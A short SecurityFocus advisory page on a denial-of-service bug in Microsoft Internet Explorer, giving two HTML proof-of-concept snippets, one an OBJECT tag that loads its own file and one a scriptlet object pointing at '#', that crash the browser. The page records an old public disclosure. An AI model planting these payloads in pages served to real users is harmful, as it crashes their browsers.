Microsoft Internet Explorer Self-Referential Object Denial of Service Vulnerability

The following example was provided by "Matthew Murphy" <mattmurphy@kc.rr.com>:

Create a file named "CRASH.HTM" with the following line in it:

<OBJECT DATA="CRASH.HTM" TYPE="text/html"></OBJECT>

The following example was also submitted by Ryan Emerle:

<object id="test"
data="#"
width="100%" height="100%"
type="text/x-scriptlet"
VIEWASTEXT></object>


 

Privacy Statement
Copyright 2010, SecurityFocus